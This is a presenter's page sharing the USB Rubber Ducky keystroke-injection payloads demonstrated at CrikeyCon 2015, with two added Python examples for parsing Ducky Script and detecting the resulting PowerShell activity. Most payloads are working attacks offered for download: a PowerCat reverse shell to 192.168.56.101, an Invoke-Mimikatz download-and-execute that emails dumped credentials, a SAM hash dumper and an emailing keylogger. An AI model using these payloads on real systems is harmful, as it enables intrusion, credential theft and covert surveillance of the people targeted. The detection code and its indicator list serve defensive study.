In February 2015 I presented at CrikeyCon 2015, the second year of the conference. I was extremely grateful to be asked back again.

On this page you can find all of the scripts which I demonstrated at CrikeyCon 2015. I have included links to a txt version of each script/payload, as well as an encoded version where feasible.

The following scripts are available:

  • Hello World
  • PowerCat Reverse Shell
  • Rick Roll Desktop
  • Invoke-Mimikatz
  • Dump Hashes to SD Card
  • Keylogger with email

Hello World

This script simply opens notepad.exe and then types some text for the user to read.

DELAY 500
GUI R
DELAY 500
STRING notepad
ENTER
DELAY 500
STRING Hello CrikeyCON!
ENTER
STRING Back Once Again it's the Renegade Drop Bear
ENTER
STRING In a hazy post-G20 dystopia, a small and dishevelled group emerges from the ashes of Bris Vegas.
ENTER
STRING This battle hardened core gaze upon the ruins of this once great city, and vow to rebuild, in the only way they know how...
STRING by making CrikeyCon 2015 bigger and better!
ENTER

Download:
Plain Text
Encoded
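Ducky Script is simple enough to interpret offline. The Python below is an added example, not one of the payloads from the talk and not Hak5's encoder: it parses the subset of commands used on this page (DELAY, STRING, ENTER, modifier combinations such as GUI R and ALT F4, bare keys such as MENU, CAPSLOCK and LEFT) plus REM and DEFAULT_DELAY, and reconstructs what the host keyboard driver receives, so a script found on a stray device can be summarised without plugging the device in: how long it runs, what it types, and every command line it submits to the Win+R Run dialog. The sample script at the bottom is constructed for the example; the Trace fields and the command subset are my choices, not part of any Ducky Script specification.

```python
"""Ducky Script triage parser (added example; not a payload from the page, not Hak5's encoder)."""
from dataclasses import dataclass, field

MODIFIERS = {"GUI", "WINDOWS", "CTRL", "CONTROL", "ALT", "SHIFT"}
BARE_KEYS = {"ENTER", "MENU", "APP", "CAPSLOCK", "NUMLOCK", "ESCAPE", "ESC",
             "TAB", "SPACE", "BACKSPACE", "DELETE", "LEFT", "RIGHT", "UP",
             "DOWN", "HOME", "END", "PAGEUP", "PAGEDOWN", "PRINTSCREEN",
             *{f"F{i}" for i in range(1, 13)}}


@dataclass
class Trace:
    total_delay_ms: int = 0
    keystrokes: list[str] = field(default_factory=list)    # symbolic key events, in order
    typed_lines: list[str] = field(default_factory=list)   # text sent before each ENTER
    run_commands: list[str] = field(default_factory=list)  # lines submitted to the Run dialog


def parse_ducky(script: str) -> Trace:
    """Interpret a Ducky Script; raises ValueError on commands outside this subset."""
    trace = Trace()
    default_delay = 0
    buffer = ""             # text typed since the last ENTER
    in_run_dialog = False   # set by GUI r, cleared by the ENTER that submits the command
    for lineno, raw in enumerate(script.splitlines(), start=1):
        line = raw.strip()
        if not line:
            continue
        cmd, _, arg = line.partition(" ")
        cmd = cmd.upper()
        if cmd == "REM":
            continue
        if cmd in ("DEFAULT_DELAY", "DEFAULTDELAY"):
            default_delay = int(arg)   # inserted after every subsequent command
            continue
        trace.total_delay_ms += default_delay
        if cmd == "DELAY":
            trace.total_delay_ms += int(arg)
        elif cmd == "STRING":
            buffer += arg   # host caps-lock state is not modelled; text is kept as written
        elif cmd == "ENTER":
            trace.keystrokes.append("ENTER")
            trace.typed_lines.append(buffer)
            if in_run_dialog:
                trace.run_commands.append(buffer)
                in_run_dialog = False
            buffer = ""
        elif cmd in MODIFIERS:
            trace.keystrokes.append(f"{cmd}+{arg.upper()}" if arg else cmd)
            if cmd in ("GUI", "WINDOWS") and arg.lower() == "r":
                in_run_dialog = True
                buffer = ""
        elif cmd in BARE_KEYS:
            trace.keystrokes.append(cmd)
        else:
            raise ValueError(f"line {lineno}: unknown Ducky Script command {cmd!r}")
    if buffer:
        trace.typed_lines.append(buffer)   # text left without a closing ENTER
    return trace


# Constructed sample in the same dialect as the scripts above (not a payload from the page).
SAMPLE = """\
REM open Notepad, type a greeting, run a second command, then close the window
DELAY 500
GUI R
DELAY 500
STRING notepad
ENTER
DELAY 500
STRING Hello CrikeyCON!
ENTER
GUI R
DELAY 500
STRING powershell.exe -WindowStyle Hidden -c "Get-Date"
ENTER
ALT F4
"""

if __name__ == "__main__":
    t = parse_ducky(SAMPLE)
    print(f"scripted delay: {t.total_delay_ms} ms, {len(t.keystrokes)} special keys")
    for command in t.run_commands:
        print("Run dialog:", command)
```

Everything the payload does on the host is carried by the run_commands list; those lines are what a process-creation event with command-line auditing records, so they are the natural starting point for triage or for writing a detection.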


PowerCat Reverse Shell

This script uses PowerShell and PowerCat to open a reverse shell to the host 192.168.56.101 on port 443. PowerCat is loaded from the Ducky's SD card (volume label "ducky"), and everything runs in a hidden PowerShell window.

DELAY 500
CAPSLOCK
GUI R
DELAY 500
STRING powershell.exe -ex unrestricted -WindowStyle Hidden -c "Import-Module ((Get-Volume -FileSystemLabel ducky).driveletter + ':\powercat.ps1'); powercat -c 192.168.56.101 -p 443 -ep;read-host" 
ENTER

Download:
Plain Text
Encoded


Rick Roll Desktop

This script downloads a Rick Roll image into the user's profile folder, opens it, and uses the context menu to set it as the user's desktop background. The whole process is visible to the user.

DELAY 500
GUI R
DELAY 500
STRING powershell.exe -WindowStyle Hidden -ex unrestricted -c "(new-Object net.webclient).downloadfile('http://2.bp.blogspot.com/-AXkkbmFRErs/TjCZIWGawfI/AAAAAAAAAlk/lT8yTGBYh38/s1600/Rick-Roll3.png', ($ENV:userprofile+'\Rick-Roll3.png'))"
ENTER
DELAY 5000
GUI R
DELAY 500
STRING %Userprofile%\Rick-Roll3.png
ENTER
DELAY 500
MENU
STRING k
ALT F4

Download:
Plain Text
Encoded


Invoke-Mimikatz

Download Invoke-Mimikatz, run it with -dumpcreds and then email the results off. The email is sent from a Gmail address to a specified recipient address.

This script will execute as administrator, and execution is visible to the user.

There is no encoded script, as you need to update your email address details first.

DELAY 500
CAPSLOCK
GUI R
DELAY 500
STRING powershell -c "start-process powershell -verb runas -argumentlist '-ex bypass'"
ENTER
DELAY 500
LEFT
ENTER
DELAY 500
STRING IEX (new-Object net.webclient).downloadstring('http://j.mp/imkatz')
ENTER
STRING $body = invoke-mimikatz -dumpcreds
ENTER
STRING $PasswordSecure = ConvertTo-SecureString -String 'gmail password' -AsPlainText -Force
ENTER
STRING $cred = new-object System.Management.Automation.PSCredential('[email protected]', $PasswordSecure)
ENTER
STRING Send-MailMessage -Body $body -Subject "Katz" -SmtpServer "smtp.gmail.com" -From "[email protected]" -To "recipientemail" -Credential $cred -UseSsl
ENTER
STRING exit
ENTER

Download:
Plain Text


Dump Hashes to SD Card

This script will execute a PowerShell script that extracts the local account password hashes from the SAM database. The results are saved to the SD card of the Ducky. You need a Ducky firmware image that supports this, the SD card must be labelled "ducky", and the PowerShell script must also be on the SD card.

You need the hashdump.ps1 script; you can get it here.

DELAY 500
CAPSLOCK
GUI R
DELAY 500
STRING powershell -c "start-process powershell -verb runas -argumentlist '-ex bypass'"
ENTER
DELAY 500
LEFT
ENTER
DELAY 500
STRING IEX ((Get-Volume -FileSystemLabel ducky).driveletter + ':\hashdump.ps1')
ENTER
STRING exit
ENTER

Download:
Plain Text
Encoded


Keylogger with email

This script will start a keylogger and email the captured keystrokes every minute. You need a Ducky firmware image that supports this, the SD card must be labelled "ducky", and the PowerShell script must also be on the SD card.

You need the keylogger.ps1 script; you can get it here. Make sure you update your email details in this file.

DELAY 500
GUI R
DELAY 500
STRING powershell -c "start-process powershell -verb runas -argumentlist '-ex bypass'"
ENTER
DELAY 500
LEFT
ENTER
DELAY 500
STRING IEX ((Get-Volume -FileSystemLabel ducky).driveletter + ':\keylogger.ps1')
ENTER
STRING exit
ENTER

Download:
Plain Text
Encoded
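The PowerCat, Invoke-Mimikatz, hash-dump and keylogger payloads above share a small set of observable behaviours: a PowerShell process started from the Run dialog (so its parent is explorer.exe), a hidden window, an execution-policy override, self-elevation through Start-Process -Verb RunAs, a download-and-execute cradle behind a URL shortener, a script loaded from a removable volume located by its label, and dumped credentials handed to Send-MailMessage. The Python below is an added example, not code from the talk or from any vendor: it turns those behaviours into weighted indicators and runs them over constructed records shaped like Windows Security event 4688 (with command-line auditing enabled) or Sysmon event 1, and PowerShell script-block event 4104. The record field names, the weights and the sample command lines are my assumptions for the example; the command lines are constructed to resemble the payloads above, and the shortlink in record 4 is a placeholder.

```python
"""Indicator matcher for the PowerShell activity the Ducky payloads above produce.

Added example (not from the talk, not a vendor rule).  Each record is a dict carrying
the fields a defender gets from Security event 4688 / Sysmon event 1 (Image,
ParentImage, CommandLine) or from PowerShell event 4104 (ScriptBlockText).
"""
import re
from typing import NamedTuple


class Indicator(NamedTuple):
    name: str
    pattern: re.Pattern
    weight: int


# Weights are assumptions for this example; tune them against your own baseline.
INDICATORS = [
    Indicator("hidden_window",
              re.compile(r"-w(indowstyle|in)?\s+hidden", re.I), 2),
    Indicator("execution_policy_override",
              re.compile(r"-e(xecutionpolicy|xec|x|p)?\s+(bypass|unrestricted)", re.I), 2),
    Indicator("download_cradle",   # IEX fed by DownloadString, in either order
              re.compile(r"(iex|invoke-expression)[\s\S]*downloadstring"
                         r"|downloadstring[\s\S]*(iex|invoke-expression)", re.I), 4),
    Indicator("removable_volume_by_label",
              re.compile(r"get-volume\s+-filesystemlabel", re.I), 3),
    Indicator("self_elevation",
              re.compile(r"start-process\s+powershell[^;]*-verb\s+runas", re.I), 3),
    Indicator("credential_dumper",
              re.compile(r"invoke-mimikatz|-dumpcreds", re.I), 5),
    Indicator("mail_exfil",
              re.compile(r"send-mailmessage", re.I), 3),
    Indicator("url_shortener",
              re.compile(r"https?://(j\.mp|bit\.ly|tinyurl\.com|goo\.gl)/", re.I), 2),
]


def score_record(record: dict) -> tuple[int, list[str]]:
    """Return (score, matched indicator names) for one 4688 / Sysmon 1 / 4104 record."""
    text = record.get("CommandLine") or record.get("ScriptBlockText") or ""
    hits = [ind.name for ind in INDICATORS if ind.pattern.search(text)]
    score = sum(ind.weight for ind in INDICATORS if ind.name in hits)
    # Keystroke injection reaches PowerShell through the Run dialog, so the parent is the
    # interactive shell rather than a scheduler, management agent or logon script.
    parent = record.get("ParentImage", "").lower()
    image = record.get("Image", "").lower()
    if parent.endswith("explorer.exe") and image.endswith(("powershell.exe", "pwsh.exe")):
        hits.append("powershell_from_explorer")
        score += 1
    return score, hits


def triage(records, threshold: int = 5):
    """Records scoring at or above the threshold, highest score first."""
    flagged = []
    for record in records:
        score, hits = score_record(record)
        if score >= threshold:
            flagged.append((score, record["RecordId"], hits))
    return sorted(flagged, key=lambda item: (-item[0], item[1]))


# Constructed records (not real telemetry); command lines resemble the payloads above.
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_RECORDS = [
    {"RecordId": 1, "EventID": 4688, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS_EXE,
     "CommandLine": "powershell.exe -ex unrestricted -WindowStyle Hidden -c "
                    "\"Import-Module ((Get-Volume -FileSystemLabel ducky).driveletter + ':\\tool.ps1')\""},
    {"RecordId": 2, "EventID": 4688, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS_EXE,
     "CommandLine": "powershell -c \"start-process powershell -verb runas -argumentlist '-ex bypass'\""},
    {"RecordId": 3, "EventID": 4688, "ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS_EXE,
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\Scripts\inventory.ps1"},
    {"RecordId": 4, "EventID": 4104,   # placeholder shortlink, not a real URL
     "ScriptBlockText": "IEX (new-Object net.webclient).downloadstring('http://j.mp/xxxxxx')"},
    {"RecordId": 5, "EventID": 4104,
     "ScriptBlockText": "$body = invoke-mimikatz -dumpcreds; Send-MailMessage -Body $body -SmtpServer smtp.gmail.com -UseSsl"},
]

if __name__ == "__main__":
    for score, record_id, hits in triage(SAMPLE_RECORDS):
        print(f"record {record_id}: score {score}: {', '.join(hits)}")
```

Record 3, a scheduled inventory script with a RemoteSigned policy and a non-interactive parent, scores zero, which is the point of weighting behaviours rather than alerting on powershell.exe alone; the two 4104 records show why script-block logging matters, since the cradle and the mail exfiltration never appear on a process command line.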